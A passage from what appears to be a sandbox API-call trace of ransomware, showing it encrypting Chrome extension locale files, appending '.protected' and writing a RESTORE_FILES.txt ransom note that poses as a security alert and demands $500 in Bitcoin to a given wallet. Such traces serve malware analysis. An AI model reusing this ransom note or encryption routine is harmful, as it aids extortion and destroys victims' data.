(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.732] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.732] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.732] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.732] CloseHandle (hObject=0x164) returned 1 [0080.733] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.733] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0080.733] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0080.733] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0080.733] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0080.733] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0080.733] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk") returned 141 [0080.733] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0080.733] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0080.733] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\*") returned 143 [0080.733] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.733] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.733] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.733] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.733] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.733] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.733] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\.") returned 143 [0080.733] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.733] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.733] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.733] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.733] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.733] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.733] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.733] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\..") returned 144 [0080.733] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.733] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.733] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.733] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.733] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.734] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.734] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.734] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.734] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json") returned 155 [0080.734] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.734] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.734] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.734] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json") returned 155 [0080.734] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json") returned 155 [0080.734] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json") returned 155 [0080.734] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.734] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x115, lpOverlapped=0x0) returned 1 [0080.735] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeeb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.735] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x115, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x115, lpOverlapped=0x0) returned 1 [0080.735] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.736] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.736] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.736] CloseHandle (hObject=0x168) returned 1 [0080.736] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.protected") returned 165 [0080.736] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.protected")) returned 1 [0080.737] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.737] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.737] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\RESTORE_FILES.txt") returned 159 [0080.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.737] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.737] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.738] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.738] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.738] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.738] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.738] CloseHandle (hObject=0x164) returned 1 [0080.738] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.738] lstrcmpiW (lpString1="ur", lpString2="Windows") returned -1 [0080.738] lstrcmpiW (lpString1="ur", lpString2="Program Files") returned 1 [0080.738] lstrcmpiW (lpString1="ur", lpString2="Program Files (x86)") returned 1 [0080.738] lstrcmpiW (lpString1="ur", lpString2="$Recycle.bin") returned 1 [0080.738] lstrcmpiW (lpString1="ur", lpString2="System Volume Information") returned 1 [0080.738] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur") returned 141 [0080.738] lstrcmpW (lpString1="ur", lpString2=".") returned 1 [0080.738] lstrcmpW (lpString1="ur", lpString2="..") returned 1 [0080.738] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\*") returned 143 [0080.738] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.739] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.739] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.739] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.739] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.739] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.739] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\.") returned 143 [0080.739] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.739] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.739] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.739] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.739] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.739] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.739] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.739] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\..") returned 144 [0080.739] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.739] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.739] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.739] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.739] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.739] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.739] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.739] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.739] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json") returned 155 [0080.739] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.739] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.739] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.739] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.740] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json") returned 155 [0080.740] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.740] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json") returned 155 [0080.740] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.740] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json") returned 155 [0080.740] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.740] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x177, lpOverlapped=0x0) returned 1 [0080.741] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe89, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.741] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x177, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x177, lpOverlapped=0x0) returned 1 [0080.741] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.741] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.741] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.741] CloseHandle (hObject=0x168) returned 1 [0080.741] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.protected") returned 165 [0080.741] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.protected")) returned 1 [0080.742] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.742] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.742] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\RESTORE_FILES.txt") returned 159 [0080.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.742] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.742] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.743] lstrlenA 